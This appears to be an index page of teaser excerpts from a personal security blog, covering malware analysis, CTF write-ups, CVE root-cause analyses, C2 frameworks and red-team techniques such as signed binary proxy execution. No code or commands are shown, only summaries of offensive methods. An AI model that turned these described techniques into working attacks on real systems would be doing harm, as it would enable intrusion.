Welcome to Arch Cloud Labs! Arch Cloud Labs is a personal blog site for my side projects, CTFs write-ups, independent research, and other ramblings. All content here is done on the author’s own time and does not reflect the view of their employer(s). Talks DEF CON 2023 - WINE Pairing with Malware DevSecOps Days 2023 - Golfing with Dragons: Building Secure Environments for CTF Competitions ATT&CKCON 3.0 2022 - ATT&CKING Containers in The Cloud SANS 2021 Blue Team Summit (Lighting Talk) - Liv...| Arch Cloud Labs
DIY Malware Homelab Course Do you have the desire to grow your skills in Malware Analysis, RE, and Software Engineering beyond just following tutorials? Arch Cloud Labs was built on honeypots and analyzing malware samples in a homelab environment to create a unique way to build those skills. This course offers a quick taste of building malware analysis pipeline in your homelab to recreate analysis done by large firms as well as inspire you to do analysis of your own.| Arch Cloud Labs
About The Project The video game hacking community is often a source of inspiration for those in the information security field. From in-depth memory hooking techniques to circumvent anti-cheat to beating the final boss via Cheat Engine scripts, there’s always something to learn that’s parallel to the challenges faced by those in the offensive or defensive field. The techniques discussed in this blog are analogous to methodologies used for malware analysis when dealing with custom packers.| Arch Cloud Labs
About The Project Trying to stay up to date with the latest security research is challenging. There are countless security blog posts, and interesting academic papers to keep up with. Realistically you don’t have time to sit down and read everything that looks interesting. Wouldn’t it be great to have your own personal “Audible”-esque service to listen to articles as you did chores around the house? This blog post is about integrating AWS’ Text-to-Speech service, “Polly” to gene...| www.archcloudlabs.com
This past year at DEF CON, the Embedded Systems Village (ESV) sold a custom badge that at the time, I thought was a CTF challenge. Fast forward months later when I’ve actually sat down to look at the badge, It turns out the badge is centered around a “FTDI chip” which enables communication to multiple embedded communication protocols. The badge actually enabled CTF contestants at DEF CON to poke at embedded systems, and is a pretty useful device for the casual hardware hacker.| www.archcloudlabs.com
About The Project Arch Cloud Labs’ last three blog posts were diving into different aspects of IoT/embedded vulnerabilities. Coming off of these bug hunting adventures, I wanted to build a unique set of Capture The Flag (CTF) challenges for this year’s Hack Fortress. To do this, I referenced OWASP’s Top 10 for IoT and Buildroot to build the custom operating system for a Raspberry Pi 1 that was deemed “HackFortress OS”.| www.archcloudlabs.com
About The Project Continuing on Arch Cloud Labs’ hardware and router reverse engineering journey, I wanted to dump the firmware of my TrendNet-731BRv1 via reading flash memory from the PCB vs downloading the firmware from TrendNet’s website. Considering a scenario where the firmware was no longer hosted publicly by TrendNet, (after all it is a discontinued product) being able to dump firmware off of a device is not only useful for situations dealing with deprecated hardware but also for p...| www.archcloudlabs.com
About The Project Continuing from Arch Cloud Labs TrendNet 731BR router hacking blog post tearing apart firmware, we’ll now start poking at router hardware! The primary objective is to grow my skills in the embedded security domain for DEF CON’s IoT and Embedded Security Villages next year. This weekend’s project focused on a GL-AR750. I originally bought this router in 2017 as a travel router, and it has been collecting dust in my closet for quite some time.| www.archcloudlabs.com
About The Project Modern Software Development environments have significant debugging capabilities to troubleshoot issues with the complex nature of modern software . These debugging capabilities typically manifest in Interactive Development Environment (IDE) as features that extend an IDEs capability to examine the given state of an application at run time or analyze previous binary executions. The standalone GNU Debugger (gdb) is integrated in a wide variety of IDEs and other 3rd party (1,2...| www.archcloudlabs.com
About The Project On September 18th, The twitter account Malware Hunter Team Tweeted about a DLL, batch script, and PowerShell script being publicly hosted at 103[.]68[.]109[.]31. Given that a DLL was being hosted, I thought it would be an interesting target to reverse engineer. This blog post is analyzing that DLL and ultimately patching this simple reverse shell to call back to a local virtual machine. OSINT Initial triage with VirusTotal reports that some vendors detect the target IP addre...| www.archcloudlabs.com
About The Project In continuation of Arch Cloud Labs’ previous blog post on Pwntools, we dive deeper into the Pwntools framework, focusing on automating interactions with binary programs. Imagine a scenario where you need your binary to follow a specific path before deploying your final payload. Simply piping your shellcode into the binary won’t suffice. This is where Pwntools’ “io” methods come to the rescue, simplifying the automation of both local and remote exploits across a var...| www.archcloudlabs.com
About The Project Following up from Arch Cloud Labs’ previous blog post on Pwntools, we’ll continue to explore the pwntools framework this time focusing on shellcode generation. It’s not uncommon in the world of pwn/reverse engineering challenges for a requirement of the challenge to be to execute shellcode. Ultimately the end goal may be to obtain access to a remote system, or simply display the contents of a file. Instead of searching for shellcode on exploit-db or Packet Storm pwntoo...| www.archcloudlabs.com
About The Project Pwndbg and Pwntools are Python frameworks for automating different parts of exploit development. These frameworks are highly popular amongst CTF players as they simplify and accelerate the creation of Proof of Concept (PoC) scripts for memory corruption exploits. I’m not proficient in using pwntools, and pwndbg, but this marks the beginning of a series of blogs aimed at improving my skills with pwntools for memory corruption CTF challenges.| www.archcloudlabs.com
About the Project Several tutorials exist on how to leverage the GNU Debugger (GDB) to debug misbehaving applications. However, a majority of these blogs just show commands to run that poke at memory addresses, and don’t show the process of resolving said bug. This blog post will walk through how I recently identified, tried to fix, and ultimately reported a bug in dhcpcd 10.0.1 via gdb. Identifying The Issue The command line utility coredumpctl is used to interact with the coredumps saved ...| www.archcloudlabs.com
About The Project Recently a close friend fell victim to a scam that resulted in giving access to their laptop to a scammer via LogMeIn. This type of scam is inline with “refund scams” that YouTubers create videos for where they spend hours on call with the scammers to waste their time. This blog post will discuss the steps Arch Cloud Labs took post-access, the artifacts recovered and ultimately examining the phishing infrastructure.| www.archcloudlabs.com
About The Project CVE-2022-4883 outlines a Linux PATH hijacking vulnerability in the libxpm package. Libxpm is used in a variety of projects to parse “X Pixmap” images. The National Vulnerability Database rates this vulnerability at a CVSS score of 8.8 and Red Hat has given it a CVSS score of 8.1. Per, the Arch Linux package page, 39 packages currently list libxpm as a dependency. This blog post will walk through the vulnerability and exploitation of said vulnerability.| www.archcloudlabs.com
About The Project ClamAV is an Open Source antivirus engine that is widely used on mail servers to scan incoming messages. On February 15, 2023 ClamAV published a security advisory detailing a potential remote code execution vulnerability in its HFS+ file parser. This vulnerability was given the CVE identifier of CVE-2023-20032. While reading about this vulnerability, I stumbled across an open pull request indicating that its possible for non-privileged users to disable clamav.| www.archcloudlabs.com
About The Project GPT3 has caught the InfoSec world by storm, and there’s a million tweets, posts, articles, etc… with interesting use cases. Most of these use cases I’ve seen are focused around offensive/red team tooling. A notable exception is with IDA Pro/Ghidra plugins that aid in commenting assembly code blocks with plain english (or close to) explanations of what’s going on. Arch Cloud Labs has historically posted on how to generate shellcode with radare2 as well as how to extra...| www.archcloudlabs.com
About The Project In December of 2022, a DLL Hijacking vulnerability with a CVSS score of 7.8 was reported in the Squirrel.Windows auto-install/update utility. This blog post will analyze the vulnerability, and analyze the root cause of said issue with procmon. Analyzing the Security Advisory Squirrel.Windows is an installation utility for Windows desktop applications that does not require a traditional Windows wizzard installation. CVE-2022-46330 states that, Squirrel.Windows is both a tools...| www.archcloudlabs.com
Know Your Tools, and Fear No Bug One of my favorite series of blog posts of all time is “Unix as an IDE”. These blog posts walks you through how your Unix/Linux environment is your IDE. This philosophy of thought challenges using a dedicated IDE for development, as all the tools you need are already on your Operating System. Debugger integration? Why not just use gdb rather than the wrapper your IDE provides?| www.archcloudlabs.com
About The Project In November of 2022 the FreeBSD project announced CVE-2022-23093, a buffer overflow vulnerability in the ping utility. This blog post will analyze the vulnerability as well as document the steps to setup said environment to analyze the root cause of the issue with gdb. Illuminating the Security Advisory The FreeBSD advisory gave the following description to the vulnerability: ping reads raw IP packets from the network to process responses in the pr_pack() function.| www.archcloudlabs.com
About The Project Several Red Team projects exists to “live off the land” and avoid introducing additional executables into an environment. This gives Red Teamers and adversaries an advantage to not risk something within their toolkit from gettin caught by the latest and greatest EDR. But what about the Blue Teamers? The DFIR engineers out there tireless working to ensure the saftey of an organization? This blog post highlights how to integrate Team Cymru’s Malware Hash Registry with yo...| www.archcloudlabs.com
About the Project Today, we’re going to analyze a malicious binary recently identified by Arch Cloud Labs malware collection system “Archie”. This binary leverages the LoadLibraryA function to resolve DLLs at run time for additional functionality. Malware samples typically do this to ensure there’s limited information in the import table in an attempt to avoid triggering static rule detection, or evade EDR products. This particular sample struct me as interesting because of the stack ...| www.archcloudlabs.com
About The Project Last week I looked at a Cryptojacking campaign that leveraged a curl trick in the bash dropper to resolve IPv4 addresses from large integers values. Revisiting the bash dropper, I discovered the threat actor has updated the script to download and execute a command-and-control payload called “Termite” from the Platypus Github project. This blog walks through the analysis of termite agent, and how to statically identify the upstream IPv4 address in use.| Arch Cloud Labs
About The Project Today we’re going to look at a couple neat curl tricks I found in a recent bash dropper I was analyzing that resulted in surprisingly low VirusTotal detentions! As previously blogged about([1][2][3]), Arch Cloud Labs runs a handful of honeypots to collect attacker data to hone my skills in DFIR topics . While this was just another Cryptominer targeting an exposed docker socket, the initial dropper script used a neat trick with curl that I think was worth a quick write up.| Arch Cloud Labs
About The Project I’m currently studying for my Certified Kubernetes Security Specialist (CKS) certification. As apart of this certification, training courses recommend looking into runtime security provided by Falco. Falco is a Cloud Native Computing Foundation project created by Sysdig that allows for cloud, container and Kubernetes based log alerting. While training courses such as “A Cloud Guru” do a good job of covering container and host based log ingestion with Falco, I wanted to...| www.archcloudlabs.com
About The Project Security researcher Silas Cutler recently tweeted a link to a unique data set of Cobalt Strike Beacon payloads, and their extracted configurations (thanks Silas!). This is a fairly large data set going back to November of 2021, and containing over 100k entries (112,900 to be exact, but I had trouble parsing about 900 of them). This blog post will take a quick look at a subset of the data (112,066 total records) provided by said dataset within Elasticsearch.| www.archcloudlabs.com
About The Project Recently I’ve started supporting a package in the Arch User Repository (AUR) in order to contribute to the Arch Linux project. In an effort to “automate all the things!”, I have regular Jenkins builds cloning and building the upstream Github project. This blog post outlines how I’ve tried to aligned to the Supply Chain Level for Software Artifacts framework as an exercise in securing build supply chains for community contributions.| www.archcloudlabs.com
About The Project The e-zine tmp.out focuses on ELF/Linux related research in a style of Phrack. After reading an article on fuzzing radare2 for 0days in 30 lines of code, I thought it would be a fun weekend project to extend this research, and port their code to a container and deploy it in a Kubernetes cluster. To take it one step further, building fresh releases of the radare2 project’s master branch, and integrating it into a CI/CD pipeline which then deployed container builds to a Kube...| www.archcloudlabs.com
About The Project Lately I’ve been playing around more with binary exploitation CTF challenges. This blog post will cover recent experimentation with ELF binary loaders, and extending them to fetch a remote resource, load it into memory, and finally execute it. There are several github repos with different purpose built binary loaders for ELFs/PEs/Machos/etc… so it was easy to focus on experimentation and debugging rather than “why won’t my code compile?| www.archcloudlabs.com
About the Project Lately, I’ve seen some horror stories (1, 2) about side projects gone awry resulting in HUGE cloud bills. As a homelab enthusiast, and cloud user I wanted to write up some notes on how I stay ontop of billing to avoid surprise costs. This blog will outline some alerting pipeline I’ve built in my homelab. Building Notification Pipelines AWS Billing allows for e-mail notifications in the event you’re approaching a particular self-defined billing threshold.| www.archcloudlabs.com
About The Project With IDA Pro’s recent announcement of going to a subscription model it has some revisiting the current state of available decompilers. Off the top of my head you have Hopper, Ghidra, Radare2/Cutter, and of course Binary Ninja. Each of these utilities have their own pros and cons and also considering how frequently you’re spending time performing reverse engineering one may make more sense than the other with regards to monetary investment.| www.archcloudlabs.com
Preparing for The CKA & Diving into the Kubes I recently passed the Linux Foundation’s Certified Kubernetes Administrator (CKA) certification and thought I’d throw some notes together on how I prepared. The CKA is a hands-on practical test. There are no multiple-choice questions, just raw application of Kubernetes knowledge. Overall I enjoyed the CKA, and find that the questions asked in the exam challenges real-world examples of the day-to-day task I run into with Kubernetes.| www.archcloudlabs.com
The Art of The Homelab I’ve been homelabbing/blogging about side projects for about two years now and thought I’d compile a list of things that have been useful to me in my homelabbing journey. These are just my opinions and everyone’s goals for their homelab are different. I view my homelab as a blank canvas upon which to experiment, fail, learn and share said failures (or successes) with others. It’s a labor of love, but nothing makes my day like a Youtube/Reddit comment that says ...| www.archcloudlabs.com
About The Project Threat Intelligence comes in many forms and services that help enable the analyst, incident responder, reverse engineer, etc… to be aware of ongoing threats against enterprise environments. As a home lab enthusiast, I don’t have access to enterprise subscriptions (ex: Virustotal) to obtain insight into the latest threats. Luckily for the community, several free resources exist. This blog post will focus on how I leverage free or low cost services to gain a deeper underst...| www.archcloudlabs.com
About The Project Elasticsearch is a key component in many backend centralized logging stacks. Several Open Source and commercial software appliances leverage Elasticsearch in one way or another. This is especially true for the SIEM space. While there are many blogs on how to assess/extract data from an Elasticsearch cluster during a pentest/red team assessment, I have not seen a lot of conversations on how the discovery of an Elasticsearch server can be leveraged beyond just dumping data.| www.archcloudlabs.com
About The Project CVE-2021-3156 is a 10-year-old sudo vulnerability that allows for privilege escalation in Linux environments. If you’re responsible for a Linux server, this definitely caught your attention due to the severity. Some rough PoCs wound up Github and also on exploit-db recently. Besides patching through upstream providers supplied pathches[0,1], how would you hunt for this in your environment? This leads me to leveraging auditd in the previously blogged about red team range.| www.archcloudlabs.com
About the Project The more Cryptominer malware I look at (or anything targeting Linux), the more trends I’ve identified that are common regardless of the underlying intent. Everyone loves to use UPX. And why wouldn’t they? It’s a free Open Source packer that you can modify if you so choose, or leverage what’s available in most Linux distribution repos. Everyone loves embedding ELFs in ELFs. In my anecdotal analysis, Cryptominers have triaged systems for basic OS information before dec...| Arch Cloud Labs
About The Project With the pandemic in full swing and work from home being normal it’s natural to upgrade your home setup to make work as enjoyable as possible. Maybe you don’t have those nice monitors at home that you do have at work, but hey at least you bought a new mouse and no longer have to use the track pack! This is where the project comes into play.| www.archcloudlabs.com
About The Project - Taking a look in the Attic I was poking around at PRs and issues within the Metasploit project and stumbled across something pretty interesting. There’s a GitHub label that exists within the Metasploit project called “attic”. The “attic” label from my observations appears to be for modules that maintainers or contributors need to finish up but don’t quite have the time. Much like that shoebox full of comic books, you carefully set it aside in the attic to retur...| www.archcloudlabs.com
About The Project Tools native to an operating system that can be leveraged offensively are always attractive to red teamers. You can go a long way with Powershell and other native Windows utilities during engagements, but perhaps sometimes these utilities are too loud for your use case. With PowerShell script block and Powershell module logging enabled within an environment, you’re being detected along the way. Wouldn’t it be nice if there were various tools already installed that can be...| www.archcloudlabs.com
About the Project Signed Binary Proxy Execution is a method of executing a command or executable by proxy of an another signed executable. This method can be leveraged by those in the offensive computing community to bypass defensive mechanisms. By leveraging an executable that has been digitally signed, the trust of that application is being used to perform a particular malicious action. This post explores leveraging Signed Binary Proxy Execution via Pycharm, a popular Python IDE.| www.archcloudlabs.com
About the Project At the time of this writing PoshC2 has a Python and Bash agent that can be deployed on a target machine. Both utilities offer a plethora of ways that can be modified to achieve execution and initial delivery in unique ways. The lovely thing about Linux is that there is always another way to achieve the same goal. This second video in Arch Cloud Lab’s PoshC2 series explores how to begin making basic changes to the PoshC2 dropper as well as some inspiration for others to go ...| www.archcloudlabs.com
About the Project For the first time Arch Cloud Labs will be posting a video tutorial on how to get started with PoshC2 in a Linux environment. This video assumes some prior experience with Linux/offensive tooling frameworks, and provides just enough information to get you up and running with PoshC2. For those interested in what the exact configurations used in the video were, please checkout the snippets below. Check out the video here.| www.archcloudlabs.com
About the Project C2 Frameworks seem to keep popping up with neat features and add-ons. I wanted to create a lab environment where I could experiment with said utilities, and understand what the forensic footprint looked like for each tool. This led to “shellcompany.lan”, my red team range environment for tool testing and experimentation. Environment Considerations & Initial Design When initially designing the environment, I wanted to emulate a small business network with significant logg...| www.archcloudlabs.com
Houseplant CTF 2020 - Imagery CTF challenge “Imagery” was a high-value forensics puzzle with the following description: Photography is good fun. I took a photo of my 10 Windows earlier on but it turned out too big for my photo viewer. Apparently 2GB is too big. :( https://drive.google.com/file/d/1y4sfIaUrAOK0wXiDZXiOI-q2SYs6M--g/view?usp=sharing Alternate: https://mega.nz/file/R00hgCIa#e0gMZjsGI0cqw88GzbEzKhcijWGTEPQsst4QMfRlNqg Dev: Tom Upon downloading the image, I originally ran basic ...| www.archcloudlabs.com
About The Project Over the past two weeks, I have been analyzing registered domain names correlated to the current pandemic as a side project. This was all inspired by @jeremiahg’s tweet about the ever-growing number of registered domains related to “covid-19”. During times of crisis, malicious actors act to profit on those in fear or those showing compassion for their fellow humans. One avenue of profit phishing. There is no shortage of historical data relating to scams during times of...| www.archcloudlabs.com
ISTS - Collegiate Red vs Blue Competition This past weekend the Rochester Institute of Technology’s security club ritsec put on their annual Information Security Talent Search competition. This competition requires Blue Team members to keep critical services (logging clusters, web servers, Active Directory, etc…) running, complete business injects and provide customer support all while being infiltrated by a Red Team. A big twist on this competition is that the Blue Teams can attack other...| www.archcloudlabs.com
Hack Fortress: Forensic Challenges This past Shmoocon, the Hack Fortress group returned to deliver another action pack day of Team Fortress 2 and hacking. As previously discussed, Hack Fortress is a combination of a First Person Shooter (Team Fortress 2) and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers.| www.archcloudlabs.com
About The Project Continuing from my Malware Analysis Pipeline project, I have been spending some time tearing apart samples trying to get better at malware analysis. Doing so, I run across files that I’ve never heard of before. Obviously, Google is the first stop during the triage period of an unknown function call/DLL, etc… However, what if the DLL dropped was a modified version of a legitimate application? This is where the NSRL comes into play.| www.archcloudlabs.com
About The Project In a previous blog post, I covered how I was obtaining samples, extracting metadata, and querying the results. I’ve moved from testing in Docker containers to stand-alone VMs. Since I have a steady flow of binaries, I need to tag the binaries with something meaningful, so I’m not just aimlessly looking through binary after binary. YARA was the answer for tagging samples. Additional minor improvements were also made in the homelab to prevent any accidental malware execution.| www.archcloudlabs.com
About The Project I wanted to further my malware analysis/reverse engineering skills and create a simple malware analysis pipeline. The pipeline I planned to build can be seen below. By collecting metadata about the binaries (imports/exports/pdbs/etc…) I can quickly filter and pivot on a subset of features that interest me. Over time it may be possible to enrich this data and have something really unique in the old homelab. However, before any analysis can begin I need to acquire samples.| www.archcloudlabs.com
Hack Fortress RE Challenge: Troll Hunter What is Hack Fortress? Hack Fortress is a combination of a First Person Shooter (Team Fortress2) and a jeopardy style CTF. Teams of ten are assembled with six gamers and four hackers in a single-elimination bracket. Hackers solve challenges and unlock points to buy in-game items for gamers. Each round is thirty minutes long except for the finals which run for forty-five minutes. This event has been running consistently at DEF CON and Shmoocon for almos...| www.archcloudlabs.com
Why Build it? - The Origin Story Scrolling through Twitter and seeing my InfoSec friends and role models post crazy malware analysis writeups, CVE disclosures, and custom tool blog posts; I ask myself “How can I become better?”. How can I advance and diversify my skillset from the 9-5 I currently have? From my experience “homelabbing”, CTFs and conference talks have increased my perspective and exposure to technologies and ideas I otherwise would not normally encounter.| www.archcloudlabs.com
About The Project Recently I’ve been building rudimentary file monitoring tools to get better at Golang, and build faux-watchdog programs for research at Arch Cloud Labs. Through this experimentation, I’ve identified some interesting gaps in the inotify subsystem that are new to me, but are well documented in the Linux man pages. This blog post will explore how to circumvent read detections implemented by inotify. Inotify As a Monitoring Solution Per the Linux man page, the inotify subsys...| www.archcloudlabs.com